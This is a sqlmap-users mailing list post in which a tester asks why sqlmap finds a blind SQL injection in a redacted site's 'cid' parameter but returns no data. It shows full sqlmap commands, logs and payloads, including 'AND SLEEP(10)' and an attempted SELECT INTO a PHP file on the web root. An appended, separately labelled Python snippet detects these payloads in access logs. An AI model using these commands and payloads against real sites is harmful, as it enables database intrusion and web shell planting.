Hello members, need your help to solve this mystery.
My manual assessment against a web application revealed the possibility of
an SQL injection vulnerability, which was reconfirmed using the Netsparker
automated web application assessment tool.

I then used sqlmap to exploit the SQL injection flaw to do something
interesting, but none of it worked for me. Even sqlmap says the parameter
is injectable, and in fact it actually exploited the issue, but unfortunately
with ZERO results.

I tried almost everything from "--current-db, --dbs, --banner", and
everything was executed with a result value of None.

I even tried --sql-shell, which gave me an sql-shell> prompt, but whatever
query I tried gave ZERO results without any error. I did try some
custom queries, but that didn't work because of the stacked query limitation.

I'm positively sure that the target parameter is injectable, but couldn't make
out why it is not executing and/or giving any response to my query.

Please help me in this, Thanks in advance!

I have also posted two of the queries which I executed for your reference.


SQLMap query output
************************************************************** First query
**************************************************************

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u
http://www.xxxxxx.com/xxx10.php?cid=1111111 --current-db --no-cast
--time-sec=10 -t xxix-output

    sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover
tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 18:54:00

[18:54:00] [INFO] setting file for logging HTTP traffic
[18:54:00] [INFO] resuming back-end DBMS 'mysql'
[18:54:00] [INFO] testing connection to the target URL
[18:54:00] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: cid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=1111111 AND 1062=1062

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cid=1111111 AND SLEEP(10)
---
[18:54:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[18:54:00] [INFO] fetching current database
[18:54:00] [WARNING] running in a single-thread mode. Please consider usage
of option '--threads' for faster data retrieval
[18:54:00] [INFO] retrieved:
[18:54:01] [INFO] heuristics detected web page charset 'ascii'

[18:54:01] [WARNING] time-based comparison needs larger statistical model.
Making a few dummy requests, please wait..
[18:54:07] [WARNING] it is very important not to stress the network
adapter's bandwidth during usage of time-based payloads

[18:54:08] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
current database: None
[18:54:08] [INFO] fetched data logged to text files under
'/pentest/database/sqlmap/output/www.xxxxxx.com'

[*] shutting down at 18:54:08


************************************************************** Second query
**************************************************************
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u
http://www.xxxxxx.com/xxx10.php?cid=1111111 --time-sec=10 --sql-shell
    sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover
tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 18:18:17

[18:18:17] [INFO] resuming back-end DBMS 'mysql'
[18:18:17] [INFO] testing connection to the target URL
[18:18:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: cid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=1111111 AND 1062=1062

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cid=1111111 AND SLEEP(10)
---
[18:18:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[18:18:18] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press
ENTER
sql-shell> user()
[18:18:25] [INFO] fetching SQL query output: 'user()'
[18:18:25] [WARNING] running in a single-thread mode. Please consider usage
of option '--threads' for faster data retrieval
[18:18:25] [INFO] retrieved:
[18:18:25] [INFO] heuristics detected web page charset 'ascii'

[18:18:26] [WARNING] time-based comparison needs larger statistical model.
Making a few dummy requests, please wait..
[18:18:32] [WARNING] it is very important not to stress the network
adapter's bandwidth during usage of time-based payloads

[18:18:33] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
sql-shell> user() --hex
[18:18:59] [INFO] fetching SQL query output: 'user() --hex'
[18:18:59] [INFO] retrieved:
[18:19:00] [INFO] retrieved:
sql-shell> select
into "/var/www/xxxxxx.com/upload.php"; --hex
[18:19:16] [WARNING] execution of custom SQL queries is only available when
stacked queries are supported
sql-shell> db_name --hex
[18:19:29] [INFO] fetching SQL query output: 'db_name --hex'
[18:19:29] [INFO] retrieved:
[18:19:29] [INFO] retrieved:
sql-shell> x
[18:19:39] [INFO] fetched data logged to text files under
'/pentest/database/sqlmap/output/www.xxxxxx.com'

[*] shutting down at 18:19:39
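A defender-side check, added here and not part of the original post: it scans constructed nginx-style access log lines (documentation IP addresses, made-up timestamps) for the two blind payload shapes sqlmap reported above, "AND N=N" and "AND SLEEP(N)", and counts flagged requests per parameter, which is how this kind of probing looks from the server side.

```python
import re
from urllib.parse import urlsplit, parse_qsl
from collections import Counter

# Constructed nginx-style access log lines (not taken from the original post).
# The payload shapes mirror the ones sqlmap printed: "AND 1062=1062" and "AND SLEEP(10)".
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2013:18:54:00 +0000] "GET /xxx10.php?cid=1111111 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2013:18:54:00 +0000] "GET /xxx10.php?cid=1111111%20AND%201062%3D1062 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2013:18:54:01 +0000] "GET /xxx10.php?cid=1111111%20AND%201062%3D1063 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2013:18:54:07 +0000] "GET /xxx10.php?cid=1111111%20AND%20SLEEP(10) HTTP/1.1" 200 5120
198.51.100.7 - - [10/Oct/2013:18:54:08 +0000] "GET /xxx10.php?cid=42 HTTP/1.1" 200 4980
"""

# Combined-log-format fields we need: client IP, request target, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$')

# Signatures for the two blind techniques that appear in the post's sqlmap output.
BOOLEAN_RE = re.compile(r'\b(?:AND|OR)\s+(\d+)\s*=\s*(\d+)\b', re.I)
TIME_RE = re.compile(r'\bSLEEP\s*\(\s*\d+\s*\)', re.I)

def classify_param(value):
    """Return tags for one URL-decoded parameter value (empty list when benign)."""
    tags = []
    m = BOOLEAN_RE.search(value)
    if m:
        # A true comparison (1062=1062) and a false one (1062=1063) are the
        # two halves of a boolean-based blind probe; both are worth flagging.
        tags.append("boolean-blind-true" if m.group(1) == m.group(2) else "boolean-blind-false")
    if TIME_RE.search(value):
        tags.append("time-blind")
    return tags

def scan_log(text):
    """Return (ip, path, param, tags) for every request carrying a flagged parameter."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes values, so "%20AND%201062%3D1062" becomes " AND 1062=1062".
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            tags = classify_param(value)
            if tags:
                hits.append((m.group("ip"), parts.path, name, tags))
    return hits

def summarize(hits):
    """Count flagged requests per (ip, path, param); blind extraction shows up as many hits on one parameter."""
    return Counter((ip, path, param) for ip, path, param, _ in hits)
```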
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
